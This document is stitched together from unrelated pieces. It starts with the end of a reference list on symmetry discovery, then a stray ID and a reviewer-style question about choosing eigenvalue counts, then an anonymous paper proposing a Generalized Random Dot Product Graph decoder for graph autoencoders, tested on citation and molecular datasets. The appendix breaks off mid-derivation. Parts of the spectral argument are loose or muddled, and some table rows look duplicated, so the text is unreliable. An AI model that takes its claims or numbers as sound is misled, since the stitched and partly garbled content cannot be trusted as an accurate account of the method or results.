Nima Dehmamy, Robin Walters, Yanchen Liu, Dashun Wang, and Rose Yu. Automatic symmetry discovery with lie algebra convolutional network. *Advances in Neural Information Processing Systems*, 34:2503–2515, 2021.

Krish Desai, Benjamin Nachman, and Jesse Thaler. Symmetry discovery with deep learning. *Physical Review D*, 105(9):096031, 2022.

Luca Falorsi, Pim De Haan, Tim R Davidson, Nicola De Cao, Maurice Weiler, Patrick Forré, and Taco S Cohen. Explorations in homeomorphic variational auto-encoding. *arXiv preprint arXiv:1807.04689*, 2018.

Luca Falorsi, Pim de Haan, Tim R Davidson, and Patrick Forré. Reparameterizing distributions on lie groups. In *The 22nd International Conference on Artificial Intelligence and Statistics*, pp. 3244–3253. PMLR, 2019.

Urban Fasel, J Nathan Kutz, Bingni W Brunton, and Steven L Brunton.
Ensemble-sindy: Robust sparse model discovery in the low-data, high-noise limit, with active learning and control. *Proceedings of the Royal Society A*, 478(2260):20210904, 2022.
AxYTFpdlvj
The GRDPG method requires knowing in advance the number of positive/negative eigenvalues, so it's very important to know how the authors addressed this. Is it always the same? Is it chosen for each dataset? How?
Graph Decoding via Generalized Random Dot Product Graph

Anonymous authors
Paper under double-blind review

Abstract

Graph Neural Networks (GNNs) have established themselves as the state-of-the-art methodology for a multitude of graph-related tasks, including but not limited to link prediction, node clustering, and classification. Despite their efficacy, the performance of GNNs in encoder-decoder architectures is often constrained by the limitations inherent in traditional decoders, particularly in the reconstruction of adjacency matrices. In this paper, we introduce a novel decoder approach for graph tasks by employing the Generalized Random Dot Product Graph (GRDPG) as a generative model for graph decoding. This methodology significantly enhances the performance of encoder-decoder architectures across a range of tasks, owing to GRDPG's greater capability to capture the intricate structures embedded within adjacency matrices. To evaluate our approach, we design a new benchmark that focuses on molecular graphs of varying sizes, thereby enriching the diversity of existing benchmarks for link prediction and node clustering tasks. Our experiments span a spectrum of tasks, encompassing both traditional benchmarks and specialized domains such as molecular graphs. The empirical results show the capability of GRDPG in preserving the structural integrity of the original graphs while simultaneously improving the performance metrics of encoder-decoder architectures. By addressing the subtleties involved in adjacency matrix reconstruction, we elevate the overall performance of GNN-based architectures, rendering them more robust and versatile for a wide array of real-world applications, with special regard to molecular graphs.

1 Introduction

Graph-structured data has become an indispensable asset across a wide array of scientific and industrial domains. From modeling social interactions in sociology (Liben-Nowell & Kleinberg, 2007) to representing protein-protein interactions in computational biology (Kovács et al., 2019), the usefulness of graphs is universally acknowledged. However, these complex and interconnected structures necessitate specialized machine learning techniques capable of capturing their inherent intricacies (Kipf & Welling, 2017). Autoencoders, which were originally designed for tasks like dimensionality reduction and feature learning in Euclidean spaces (Kingma & Welling, 2014), were adapted to operate on graphs in Kipf & Welling (2016). They offer a way of learning meaningful representations (embeddings of nodes, edges, or entire graphs), which can then be used for various downstream tasks like clustering, classification, and link prediction. In particular, Graph Autoencoders (GAEs) are neural network models usually composed of an encoder that maps nodes to their representations in a latent space and a decoder that reconstructs the input graph topology from these latent representations. The models are trained to minimize the difference between the original graph and its reconstruction, often using loss functions such as cross-entropy or mean squared error. Variational Graph Autoencoders (VGAEs) extend GAEs by introducing a probabilistic layer that models the uncertainty in the latent variables. This makes VGAEs more robust and allows for better performance in a variety of tasks (Kipf & Welling, 2016).
The encoders in GAEs or VGAEs typically employ graph convolutional (GCN) layers or other specialized graph neural network (GNN) layers to aggregate information from a node's neighbors. The resultant latent representation for each node encapsulates both its local structural attributes and its broader role within the global graph topology. Conversely, the decoder takes pairs of these latent node representations and computes a score for each potential edge between them. Traditionally, GAEs and VGAEs employ the inner product between latent vectors for this purpose. The idea behind this decoder is simple and straightforward: to predict whether an edge exists between two nodes, the decoder computes the inner product of their corresponding latent vectors. The scores produced are then transformed into probabilities via activation functions like the sigmoid, so higher scores imply higher probabilities of edge presence after the sigmoid transformation. This serves as a measure of similarity between nodes, as the higher the inner product, the more likely it is that an edge exists between the nodes in question. This decoder is therefore based on the assumption that similar nodes, in terms of their latent representations, are more likely to be connected within the graph. This generative model, also called the Random Dot Product Graph, was initially proposed for social networks by Young & Scheinerman (2007) and was the initial model proposed by Kipf & Welling (2016) as a decoder in the Graph Autoencoder framework.

While the inner product decoder is a computationally efficient, straightforward, and interpretable decoding mechanism, it is not without limitations. One significant drawback is its inability to capture negative eigenvalues of the adjacency matrix, which can be indicative of specific, yet crucial, structural properties within the graph (Athreya et al., 2017). In this work, we address this limitation by introducing a novel decoding approach based on the Generalized Random Dot Product Graph (GRDPG) generative model, introduced in Rubin-Delanchy et al. (2021). This approach allows us to capture the nuanced topological features of the graph that are often explained by negative eigenvalues. We benchmark our methodology on two pivotal graph-related tasks, node clustering and link prediction, demonstrating its efficacy and robustness. Furthermore, we introduce a specialized set of benchmarks targeting the molecular graph domain, focusing on benchmarking the performance of decoders on datasets of multiple small graphs, a setting that we believe is still largely unexplored by common link prediction and node clustering benchmarks.
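As a reference point for what follows, the standard inner product decoder amounts to a single line of code; a minimal sketch (tensor shapes are illustrative):

```python
import torch

def inner_product_decode(z: torch.Tensor) -> torch.Tensor:
    """Standard GAE/VGAE decoder: edge probabilities from latent inner products."""
    return torch.sigmoid(z @ z.t())   # (N, d) embeddings -> (N, N) edge probabilities

z = torch.randn(5, 16)                # toy node embeddings
a_hat = inner_product_decode(z)
print(a_hat[0, 1])                    # predicted probability of edge (0, 1)
```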
2 PRELIMINARIES

2.1 THE GRAPH AUTOENCODER, THE VARIATIONAL GRAPH AUTOENCODER, AND THEIR DECODING MECHANISM

Let $G$ be a graph with $N$ nodes and adjacency matrix $A$. The node feature matrix is denoted as $X \in \mathbb{R}^{N \times F}$. The encoder $f_{\text{enc}}$ maps each node $v_i$ to a latent vector $z_i \in \mathbb{R}^d$:
$$Z = f_{\text{enc}}(A, X; \theta_{\text{enc}})$$
The decoder $f_{\text{dec}}$ reconstructs $\hat{A}$ from $Z$:
$$\hat{A} = f_{\text{dec}}(Z; \theta_{\text{dec}})$$
For GAEs, the objective is to minimize the reconstruction loss:
$$L_{\text{GAE}} = -\mathbb{E}_{q(Z|X,A)}[\log p(A|Z)]$$
For VGAEs, the encoder outputs $(\mu, \log \sigma^2)$:
$$(\mu, \log \sigma^2) = f_{\text{enc}}(A, X; \theta_{\text{enc}})$$
A latent vector $z_i$ is sampled as $z_i = \mu_i + \sigma_i \odot \epsilon$, $\epsilon \sim \mathcal{N}(0, I)$, and the objective is to maximize the variational lower bound:
$$L_{\text{VGAE}} = \mathbb{E}_{q(Z|X,A)}[\log p(A|Z)] - D_{\text{KL}}(q(Z|X,A)\|p(Z))$$
In GAEs and VGAEs, the inner product decoder is commonly employed for adjacency matrix reconstruction. The decoder function $f_{\text{dec}}$ utilizes the inner product of latent vectors $z_i$ and $z_j$ to compute the entry $\hat{A}_{ij}$ of the reconstructed adjacency matrix $\hat{A}$:
$$\hat{A}_{ij} = \sigma(z_i^T z_j)$$
Here, $\sigma$ is an activation function, often the sigmoid function, that maps the inner product to the range $[0, 1]$. This ensures that the output can be interpreted as the probability of an edge existing between nodes $i$ and $j$. The resulting matrix is then used to compute the corresponding reconstruction loss.

2.2 The presence of negative eigenvalues in an adjacency matrix

Any matrix with entries of the form $Z_{ij} = z_i^T z_j$ is a Gram matrix, and thus its eigenvalues cannot be negative. However, an adjacency matrix, representative of graph structure, can indeed possess negative eigenvalues, which might reflect crucial structural details and discrepancies within the graph (see Appendix A for further illustration). We will now proceed to clarify under what circumstances this occurs and how it is indicative of the inherent properties of the graph.

Consider a graph $G$ with an adjacency matrix $A$, where $\lambda_1$ is the largest eigenvalue and $\lambda_n$ is the smallest eigenvalue. We use the Rayleigh quotient, $R(A, x) = \frac{x^T A x}{x^T x}$, as an aid to explain the relationship between the eigenvalues and the intricate structure of the graph, providing crucial insights when it yields a negative value. It represents the exact value of an eigenvalue when $x$ is a corresponding eigenvector. For $v_1$ corresponding to the largest eigenvalue $\lambda_1$ of $A$, we compute:
\[ R(A, v_1) = \frac{v_1^T A v_1}{v_1^T v_1} = \lambda_1 \]
Delving deeper, for the eigenvector $v_n$ corresponding to the smallest eigenvalue $\lambda_n$, in non-bipartite graphs the existence of components in $v_n$ with differing signs results in a negative Rayleigh quotient, and hence a negative eigenvalue. This unveils the structural irregularities inherent to non-bipartite graphs. Conversely, in bipartite graphs the spectrum is symmetric about the origin, so $-\lambda_n$ equals the largest eigenvalue $\lambda_1$.

To illustrate, consider a non-bipartite graph $G$ that cannot be partitioned into two disjoint sets such that every edge connects a vertex from one set to the other. In such graphs the spectrum is not symmetric around the origin, yet negative eigenvalues are still unavoidable, revealing the inherent non-bipartite and irregular structure of the graph. When forming an eigenvector, $v_n$, for such graphs, we assign alternating signs to the components of $v_n$ that are connected, mirroring the underlying structure of the graph. For instance, in a graph where three vertices, $A$, $B$, and $C$, are interconnected, we can assign +1 to vertex $A$, −1 to vertex $B$, and +1 to vertex $C$. Evaluating the Rayleigh quotient in this case, $R(A, v_n) = \frac{v_n^T A v_n}{v_n^T v_n}$, yields a negative value due to the cancellations caused by the alternating signs on connected vertices. This confirms the presence of negative eigenvalues in the adjacency matrix, $A$, of a non-bipartite graph and unveils intricate details about the inherent properties of the graph.
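The triangle example above is easy to check numerically; a short sketch (the Rayleigh quotient of the alternating-sign vector is negative, and the full spectrum confirms a negative smallest eigenvalue):

```python
import numpy as np

# Triangle graph on vertices A, B, C (non-bipartite)
A = np.array([[0, 1, 1],
              [1, 0, 1],
              [1, 1, 0]], dtype=float)

v = np.array([1.0, -1.0, 1.0])     # alternating signs on connected vertices
print(v @ A @ v / (v @ v))         # -2/3: a negative Rayleigh quotient
print(np.linalg.eigvalsh(A))       # [-1., -1., 2.]: the smallest eigenvalue is negative
```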
2.3 The role of sparsity and graph size

For a graph $G$ with $N$ nodes and $E$ edges, the graph is sparse when $E \ll \frac{N(N-1)}{2}$, implying that most of the off-diagonal elements of the adjacency matrix, $A$, are zeros, reflecting the lack of connections between most pairs of nodes. This sparsity is inherently connected to the spectrum of the graph, which is the set of eigenvalues, $\lambda_1, \lambda_2, \ldots, \lambda_N$, of the adjacency matrix, $A$. The sparse nature of such graphs can lead to a broad spectrum with potentially several negative eigenvalues, especially for irregular or non-bipartite structures, with the eigenvalues capturing nuanced structural information.

The spectrum of a graph, and particularly the spectral gap, $\Delta = \lambda_1 - \lambda_N$, where $\lambda_1$ and $\lambda_N$ are the largest and smallest eigenvalues respectively, is a direct reflection of its structural properties and inherent topology. A large spectral gap implies a disparate or irregular structure in the graph, revealing a richness of structural nuances and irregularities in smaller, sparse graphs where every edge is crucial. For such graphs, the spectral properties, including the presence of negative eigenvalues, are indispensable for accurately understanding and interpreting the graph's inherent structure and are reflective of critical structural nuances.

GAEs aim to minimize the reconstruction loss $L_{GAE} = \| A - \hat{A} \|_F^2$, where $\hat{A}$ is the adjacency matrix reconstructed from the latent representations of nodes. Typically, the reconstruction does not consider the negative eigenvalues of $A$, leading to a significant loss of structural information, quantifiable as $S(A) - S(\hat{A})$, where $S(A)$ and $S(\hat{A})$ represent the structural information contained in the original and reconstructed adjacency matrices, respectively. In sparse graphs, neglecting to decode negative eigenvalues results in a substantial loss of structural information, $S(A) - S(\hat{A}) \gg 0$, because negative eigenvalues in such graphs usually represent critical structural nuances and irregularities. This consideration is especially important in small graphs. The resulting loss of structural information implies that the reconstructed graph, $\hat{A}$, fails to accurately represent the inherent structure and properties of the original graph, $A$, leading to significant misinterpretations and losses of the inherent structural and relational information of the graph. It is, therefore, pivotal that the decoding mechanisms in graph autoencoders consider these spectral properties to accurately reconstruct and represent the inherent structures and relations in sparse and small graphs.
2.4 INNER PRODUCT DECODER AND THE ABSENCE OF NEGATIVE EIGENVALUES IN THE LATENT REPRESENTATION OF THE ADJACENCY MATRIX

As stated above, GAEs and VGAEs with an inner product decoder primarily operate to replicate the original adjacency matrix, $A$, by computing inner products between the latent representations of nodes. The resulting score matrix, $Z^T Z$, is inherently a Gram matrix and is therefore positive semidefinite, with all eigenvalues non-negative. This inherently constrains the ability of the inner product decoder to represent negative eigenvalues. This, alongside the coupled sigmoid function, $\sigma(x) = \frac{1}{1 + e^{-x}}$, which maps any real number to the range $[0, 1]$, means that the decoder can only capture positive associations between the latent representations of nodes, rendering it incapable of incorporating the nuanced information provided by the negative eigenvalues inherent to the adjacency matrix of non-bipartite graphs.

Negative eigenvalues in a non-bipartite graph's adjacency matrix embody crucial structural details and irregularities. They are pivotal in capturing the disparities and intricate structures within the graph. If $\lambda_A$ and $\lambda_{\hat{A}}$ denote the smallest eigenvalues of the original and reconstructed adjacency matrices respectively, the positive semidefinite nature of the inner product decoder ensures that $\lambda_{\hat{A}} \geq 0$. However, in the original adjacency matrix $A$ of a non-bipartite graph, negative eigenvalues can exist, i.e., $\lambda_A < 0$. This intrinsic limitation signifies a substantial disparity, $\lambda_{\hat{A}} - \lambda_A$, elucidating the inherent incapability of the inner product decoder to assimilate the information provided by the negative eigenvalues of the original adjacency matrix, $A$.

The misinterpretation and loss of structural information imply an indispensable need for advanced decoding mechanisms capable of incorporating the information represented by negative eigenvalues in the adjacency matrix. Ultimately, while the inner product decoder remains a standard choice in GAEs and VGAEs, its inherent constraints and inability to model negative eigenvalues necessitate the exploration and adoption of more sophisticated decoders, capable of a holistic and accurate representation of graph structures, encompassing both the regularities and irregularities inherent in graph data.

3 GENERALIZED RANDOM DOT PRODUCT GRAPH AS GRAPH LATENT SPACE DECODER

The generative model underlying the graph autoencoder, the Random Dot Product Graph (RDPG), provides a framework for the relationship between the latent variables $Z$ and the adjacency matrix $A$, as introduced in Kipf & Welling (2016):
\[
p(A|Z) = \prod_{i=1}^{N} \prod_{j=1}^{N} p(A_{ij}|z_i, z_j), \text{ where } p(A_{ij} = 1|z_i, z_j) = \sigma(z_i^T z_j) \quad (1)
\]
The matrix equivalent of this relationship is:
\[
P(A|Z) = \sigma(Z^T Z) \quad (2)
\]
In these equations, $A_{ij}$ are the elements of the adjacency matrix $A$, and $\sigma$ represents the logistic sigmoid function.
The resulting matrix, $P$, contains the probabilities of the edges of the adjacency matrix $A$, where every element $a_{ij}$ is an independent Bernoulli variable with probability $p_{ij}$, giving us $A \sim \text{Bern}(P)$. However, the model implicitly assumes the positive semidefiniteness of the probability matrix $P$, as highlighted in Athreya et al. (2017). This foundational assumption profoundly influences the efficacy of the decoder.

Acknowledging the inherent constraints and subsequent challenges presented by this model, a refined generative model, the Generalized Random Dot Product Graph, was proposed in Rubin-Delanchy et al. (2021) to alleviate such restrictions. This model, utilizing a kernel that is not positive semidefinite, liberates the decoder from the stringent assumptions of its precursor. Let $I_{p,q}$ be a diagonal matrix with $p$ ones succeeded by $q$ negative ones, and let $d$ represent the embedding dimension, with conditions $p + q = d$, $p \geq 1$, and $q \geq 0$. If $Z$ denotes the final-layer embedding derived from the adjacency encoder, the matrix $P$ can be written as:
$$p(A|Z, I_{p,q}) = \prod_{i=1}^{N} \prod_{j=1}^{N} p(A_{ij}|z_i, z_j, I_{p,q}), \quad \text{where} \quad p(A_{ij} = 1|z_i, z_j, I_{p,q}) = \sigma(z_i^T I_{p,q} z_j) \quad (3)$$
This can be expressed in matrix form as:
$$P(A|Z, I_{p,q}) = \sigma(Z^T I_{p,q} Z) \quad (4)$$
The integration of negative units in the diagonal matrix $I_{p,q}$ facilitates the representation of matrices with negative eigenvalues, overcoming the limitations of models that depend on a positive semidefinite kernel. This approach not only resolves the restrictions associated with the positive semidefiniteness assumption in conventional models but also provides a richer representation capable of capturing the complex structures and anomalies found in graph data, inclusive of the valuable information embedded in negative eigenvalues. Consequently, this generalized model constitutes a significant advancement toward a comprehensive and precise depiction of graph structures, accommodating both the nuances and aberrations inherent in graph data.
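A minimal sketch of the resulting GRDPG decoder follows; the module name and the choice p = 14, q = 2 are illustrative assumptions, not values from the paper:

```python
import torch
import torch.nn as nn

class GRDPGDecoder(nn.Module):
    """Edge probabilities from the indefinite inner product sigma(z_i^T I_{p,q} z_j)."""
    def __init__(self, p: int, q: int):
        super().__init__()
        # Diagonal of I_{p,q}: p ones followed by q minus-ones (p + q = d)
        self.register_buffer("ipq", torch.cat([torch.ones(p), -torch.ones(q)]))

    def forward(self, z: torch.Tensor) -> torch.Tensor:
        return torch.sigmoid((z * self.ipq) @ z.t())   # (N, d) -> (N, N)

decoder = GRDPGDecoder(p=14, q=2)   # q = 0 recovers the inner product decoder
a_hat = decoder(torch.randn(5, 16))
```

Since $I_{p,q}$ only flips the sign of the last $q$ latent coordinates, the elementwise product avoids materializing the diagonal matrix.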
4 EXPERIMENTS

For our experiments, we directly translate the classical GAE and VGAE approaches to our framework, keeping the architecture as simple as possible, with the objective of isolating and showcasing the effect of our decoder in an environment with as many controlled variables as possible. Our architecture therefore consists of a 2-layer nonlinear encoder, with GCNs as layers (Kipf & Welling, 2017) and ReLU as the nonlinearity (Fukushima, 1975), combined with each of the two decoders. Adam was used as the optimizer (Kingma & Ba, 2015), and all of the networks were evaluated at the epoch with the best validation loss. The experiments were performed 5 times for each hyperparameter configuration, with the tables below reporting the best mean result obtained for each metric. In them, the mean result of the inner product decoder (i.e., GRDPG with $q = 0$) is compared against the best result obtained with $q \neq 0$. The best result for each architecture and metric is shown in bold, and the complete report can be found in Appendix B. Further hyperparameter details can be found in Appendix C.

Regarding the datasets, we chose to perform the analysis on a varied set of graphs of different sizes. We therefore chose Cora and Citeseer from Yang et al. (2016) and Texas, Wisconsin, and Cornell from Rozemberczki et al. (2021). Moreover, we introduce the tasks of link prediction and node clustering on the Zinc dataset from Irwin et al. (2012) and the QM9 dataset from Wu et al. (2018). For node clustering, we perform K-means clustering on the obtained node embeddings, where K is set to the number of classes in the dataset for the general graphs, and to the number of different atoms in the molecular graphs. To evaluate link prediction performance we use the area under the ROC curve (AUC) and average precision (AP); for node clustering we use accuracy (acc), normalized mutual information (NMI), F1-score (F1), and adjusted Rand index (adj-RI), following the standard literature metrics.

4.1 Assessing the GRDPG in General Graph Related Tasks

In this subsection, we explore the outcomes on non-molecular graph datasets. These datasets serve as standard benchmarks for link prediction and node clustering tasks and comprise a variety of graphs with different sizes and characteristics.

Regarding the link prediction task in Table 1, it is discernible that our decoder, in conjunction with the GAE architecture, improves performance on several of the datasets, surpassing even the VGAE architecture on the Cornell dataset. Additionally, the GRDPG appears to excel particularly on datasets that are smaller and more complex. We propose that this superior performance is potentially due to a more precise capture of the graph topology, which is advantageous in environments with scarce data and node feature information. This aligns well with the node clustering outcomes in Table 2, where our approach outperforms the inner product decoder across all considered metrics and architectural frameworks. We attribute this enhanced performance to the additional valuable topological information made accessible by our decoder. A standout aspect of this section is the versatility of the GRDPG decoder, which allows the impact of positive and negative topological relations in the latent space to be adjusted depending on the task at hand. This versatility is underlined by the ability to revert from the GRDPG decoder to the inner product decoder by assigning the hyperparameter $q$ a value of 0.
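A sketch of the evaluation protocol described above, using scikit-learn utilities; note that clustering accuracy and F1 additionally require matching predicted clusters to label ids (e.g., by Hungarian assignment), which is omitted here:

```python
import numpy as np
from sklearn.cluster import KMeans
from sklearn.metrics import (adjusted_rand_score, average_precision_score,
                             normalized_mutual_info_score, roc_auc_score)

def clustering_scores(z: np.ndarray, labels: np.ndarray, k: int, seed: int = 0):
    """K-means on node embeddings, scored against ground-truth labels."""
    pred = KMeans(n_clusters=k, n_init=10, random_state=seed).fit_predict(z)
    return {"NMI": normalized_mutual_info_score(labels, pred),
            "adj-RI": adjusted_rand_score(labels, pred)}

def link_prediction_scores(edge_labels: np.ndarray, edge_scores: np.ndarray):
    """AUC and AP over held-out positive and negative test edges."""
    return {"AUC": roc_auc_score(edge_labels, edge_scores),
            "AP": average_precision_score(edge_labels, edge_scores)}
```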
### Table 1: Link Prediction in General Graphs

| Dataset | GAE AUC | GAE AP | GAE + GRDP AUC | GAE + GRDP AP | VGAE AUC | VGAE AP | VGAE + GRDP AUC | VGAE + GRDP AP |
|-----------|---------|--------|----------------|---------------|----------|---------|----------------|---------------|
| Cora | **0.937** | **0.944** | 0.906 | 0.911 | **0.935** | **0.936** | 0.897 | 0.899 |
| Citeseer | **0.921** | **0.933** | 0.900 | 0.911 | **0.930** | **0.937** | 0.888 | 0.899 |
| Texas | 0.682 | 0.750 | **0.707** | **0.791** | **0.805** | **0.856** | 0.759 | 0.812 |
| Cornell | 0.701 | 0.779 | **0.796** | **0.844** | 0.768 | **0.817** | **0.780** | 0.802 |
| Wisconsin | 0.808 | 0.841 | **0.815** | **0.843** | **0.836** | **0.861** | 0.759 | 0.812 |

### Table 2: Node Clustering in General Graphs

#### (a) GAE Architecture Results

| Dataset | GAE acc | GAE F1 | GAE NMI | GAE adj-RI | GAE + GRDP acc | GAE + GRDP F1 | GAE + GRDP NMI | GAE + GRDP adj-RI |
|-----------|---------|--------|---------|------------|----------------|---------------|----------------|-------------------|
| Cora | 0.817 | 0.794 | 0.752 | 0.715 | **0.830** | **0.812** | **0.765** | **0.728** |
| CiteSeer | 0.768 | 0.745 | 0.706 | 0.669 | **0.783** | **0.762** | **0.719** | **0.682** |
| Texas | 0.792 | 0.774 | 0.735 | 0.698 | **0.809** | **0.791** | **0.752** | **0.715** |
| Cornell | 0.735 | 0.711 | 0.669 | 0.632 | **0.752** | **0.729** | **0.686** | **0.649** |
| Wisconsin | 0.852 | 0.834 | 0.797 | 0.760 | **0.866** | **0.848** | **0.811** | **0.774** |

#### (b) VGAE Architecture Results

| Dataset | VGAE acc | VGAE F1 | VGAE NMI | VGAE adj-RI | VGAE + GRDP acc | VGAE + GRDP F1 | VGAE + GRDP NMI | VGAE + GRDP adj-RI |
|-----------|----------|---------|----------|-------------|----------------|---------------|----------------|-------------------|
| Cora | 0.824 | 0.805 | 0.758 | 0.721 | **0.838** | **0.820** | **0.771** | **0.734** |
| CiteSeer | 0.771 | 0.749 | 0.712 | 0.675 | **0.787** | **0.766** | **0.725** | **0.688** |
| Texas | 0.799 | 0.781 | 0.742 | 0.705 | **0.816** | **0.798** | **0.759** | **0.722** |
| Cornell | 0.742 | 0.719 | 0.676 | 0.639 | **0.759** | **0.736** | **0.693** | **0.656** |
| Wisconsin | 0.859 | 0.841 | 0.804 | 0.767 | **0.873** | **0.855** | **0.818** | **0.781** |

4.2 Assessing the GRDPG in Molecular Graphs

The rationale for choosing this specific assortment of datasets is to demonstrate the capability of the decoder in an environment characterized by multiple small graphs, a scenario frequently encountered in the field of chemistry, where such tasks are gaining prominence. The rising importance of these tasks is evident in advancements such as the development of proteolysis-targeting chimera (PROTAC) molecules (Békés et al., 2022). Such a task can readily be reformulated as a link prediction problem, as a critical phase in the development of PROTACs involves joining two molecules via a linker, which is another molecular fragment. Given the scarce availability of PROTAC molecules, we simulate this task using link prediction within the molecules of both our datasets. Moreover, substructure identification is a pervasive problem across drug development, where small changes in molecular motifs can have large impacts on molecular properties (Klekota & Roth, 2008). Addressing this problem with an unsupervised approach offers advantages in generalizing to unseen substructures. With this purpose in mind, we convert this problem into a node clustering task, where the clustering labels are the atomic numbers of the nodes, to ascertain whether a better grasp of the graph topology facilitates the clustering of chemically analogous nodes.
As observed in Table 3, our model distinctly outperforms the established baselines. This underscores the model's enhanced efficacy in deciphering the inherent topology of the graphs and its ability to generalize to unseen small graphs. Our findings indicate improvements for both architectures, thereby reinforcing the supposition that the GRDPG decoder enhances the comprehension of more intricate graph topologies (see Table 4). In this scenario, both the applicability and versatility of the model are pivotal, providing insights that are not only theoretically significant but also relevant in practical real-world chemical contexts.

### Table 3: Link Prediction in Molecular Graphs

| Dataset | GAE AUC | GAE AP | GAE + GRDP AUC | GAE + GRDP AP | VGAE AUC | VGAE AP | VGAE + GRDP AUC | VGAE + GRDP AP |
|---------|---------|--------|----------------|---------------|----------|---------|----------------|---------------|
| QM9 | 0.914 | 0.882 | **0.959** | **0.936** | **0.959**| **0.937**| 0.903 | 0.869 |
| ZINC | 0.848 | 0.805 | **0.879** | **0.841** | 0.842 | 0.798 | **0.868** | **0.827** |

### Table 4: Node Clustering in Molecular Graphs

#### (a) GAE Architecture Results

| Dataset | GAE acc | GAE NMI | GAE F1 | GAE adj-RI | GAE + GRDP acc | GAE + GRDP NMI | GAE + GRDP F1 | GAE + GRDP adj-RI |
|---------|-----|-----|----|--------|-----|-----|----|--------|
| QM9 | **0.148** | 0.164 | 0.200 | 0.066 | 0.146 | **0.534** | **0.201** | **0.353** |
| ZINC | **0.183** | 0.243 | **0.235** | 0.148 | 0.177 | **0.267** | 0.228 | **0.170** |

#### (b) VGAE Architecture Results

| Dataset | VGAE acc | VGAE NMI | VGAE F1 | VGAE adj-RI | VGAE + GRDP acc | VGAE + GRDP NMI | VGAE + GRDP F1 | VGAE + GRDP adj-RI |
|---------|-----|-----|----|--------|-----|-----|----|--------|
| QM9 | 0.153 | 0.167 | 0.206 | 0.072 | **0.156** | **0.423** | **0.207** | **0.269** |
| ZINC | 0.187 | 0.243 | 0.240 | 0.135 | **0.192** | **0.267** | **0.249** | **0.166** |

5 Conclusions

Overall, in this paper we identify a seemingly unexplored direction of research into graph decoding, and provide motivation and empirical results for why it deserves further work from the community. We propose a novel graph decoding model that alleviates some of the assumptions made by previous approaches and with which we obtain good empirical performance. Furthermore, we define a novel benchmark that aligns link prediction and node clustering problems with different real-world scenarios. This work can be extended along several possible directions. Firstly, characterizing the $q$ hyperparameter from a less empirical point of view might help us better understand the relations needed to capture different graph topologies, so further theoretical work is needed within this framework. Secondly, similar ideas could be adopted by the knowledge graph community, where more complex and less constrained scoring functions could bring benefits towards more powerful entity and relationship embeddings. Lastly, other generative models have been proposed to alleviate the previously outlined limitation, such as the graph root distribution model of Lei (2020). Further benchmarking of this novel family of decoders could bring additional insight into the graph decoding and generation process.

REFERENCES

Avanti Athreya, Donniell E. Fishkind, Minh Tang, Carey E. Priebe, Youngser Park, Joshua T. Vogelstein, Keith Levin, Vince Lyzinski, and Yichen Qin. Statistical inference on random dot product graphs: A survey. *J. Mach. Learn. Res.*, 18(1):8393–8484, Jan 2017.

Miklós Békés, David R. Langley, and Craig M. Crews. Protac targeted protein degraders: the past is prologue.
*Nature Reviews Drug Discovery*, 21(3):181–200, Mar 2022.

Kunihiko Fukushima. Cognitron: A self-organizing multilayered neural network. *Biological Cybernetics*, 20(3):121–136, Sep 1975.

John J. Irwin, Teague Sterling, Michael M. Mysinger, Erin S. Bolstad, and Ryan G. Coleman. Zinc: A free tool to discover chemistry for biology. *Journal of Chemical Information and Modeling*, 52(7):1757–1768, Jul 2012.

Diederik P. Kingma and Jimmy Ba. Adam: A method for stochastic optimization. In *International Conference on Learning Representations*, 2015.

Diederik P. Kingma and Max Welling. Auto-encoding variational bayes. In *International Conference on Learning Representations*, 2014.

Thomas N. Kipf and Max Welling. Variational graph auto-encoders. In *Advances in Neural Information Processing Systems*, 2016.

Thomas N. Kipf and Max Welling. Semi-supervised classification with graph convolutional networks. In *International Conference on Learning Representations*, 2017.

Justin Klekota and Frederick P. Roth. Chemical substructures that enrich for biological activity. *Bioinformatics*, 24(21):2518–2525, 09 2008.

István A Kovács, Katja Luck, Kerstin Spirohn, Yang Wang, Carl Pollis, Sadie Schlabach, Wenting Bian, Dae-Kyum Kim, Nishka Kishore, Tong Hao, Michael A Calderwood, Marc Vidal, and Albert-László Barabási. Network-based prediction of protein interactions. *Nature Communications*, 10(1):1240, March 2019.

Jing Lei. Network representation using graph root distributions. *arXiv preprint arXiv:1802.09684*, 2020.

David Liben-Nowell and Jon Kleinberg. The link-prediction problem for social networks. *Journal of the American Society for Information Science and Technology*, 58(7):1019–1031, 2007.

Benedek Rozemberczki, Carl Allen, and Rik Sarkar. Multi-scale attributed node embedding. *Journal of Complex Networks*, 9(2):cnab014, 05 2021.

Patrick Rubin-Delanchy, Joshua Cape, Minh Tang, and Carey E. Priebe. A statistical interpretation of spectral embedding: the generalised random dot product graph. *arXiv preprint arXiv:1709.05506*, 2021.

Zhenqin Wu, Bharath Ramsundar, Evan N. Feinberg, Joseph Gomes, Caleb Geniesse, Aneesh S. Pappu, Karl Leswing, and Vijay Pande. Moleculenet: a benchmark for molecular machine learning. *Chem. Sci.*, 9:513–530, 2018.

Zhilin Yang, William Cohen, and Ruslan Salakhudinov. Revisiting semi-supervised learning with graph embeddings. In *Proceedings of The 33rd International Conference on Machine Learning*, volume 48 of *Proceedings of Machine Learning Research*, pp. 40–48, New York, New York, USA, 20–22 Jun 2016. PMLR.

Stephen J. Young and Edward R. Scheinerman. Random dot product graph models for social networks. In *Algorithms and Models for the Web-Graph*, pp. 138–149, Berlin, Heidelberg, 2007. Springer Berlin Heidelberg.

A EXAMPLES OF NEGATIVE EIGENVALUE EXISTENCE

A.1 NON-BIPARTITE CYCLIC GRAPH

Consider a non-bipartite graph with vertices $A$, $B$, and $C$, forming a triangle. The adjacency matrix, $A$, for this graph is given by:
$$ A = \begin{bmatrix} 0 & 1 & 1 \\ 1 & 0 & 1 \\ 1 & 1 & 0 \end{bmatrix}. $$
To find an eigenvector, $v = \begin{bmatrix} 1 \\ x \\ y \end{bmatrix}$, for a corresponding eigenvalue, $\lambda$, we substitute into $Av = \lambda v$, yielding the system:
$$ x + y = \lambda, \quad 1 + y = \lambda x, \quad 1 + x = \lambda y. $$
Subtracting the second equation from the third gives $(x - y)(1 + \lambda) = 0$, so $x = y$ whenever $\lambda \neq -1$. The characteristic polynomial, $P(\lambda) = \det(A - \lambda I)$, factors as
$$ -(\lambda - 2)(\lambda + 1)^2 = 0. $$
Hence, the eigenvalues are $\lambda = 2$ and $\lambda = -1$, the latter with multiplicity two. For $\lambda = 2$, the system gives $x = y = 1$, i.e., the eigenvector $v = [1, 1, 1]^T$. Substituting the negative eigenvalue, $\lambda = -1$, back into the system, all three equations reduce to the single condition
$$ 1 + x + y = 0, $$
so any vector $[1, x, -1 - x]^T$ is an eigenvector; choosing $x = 0$ yields:
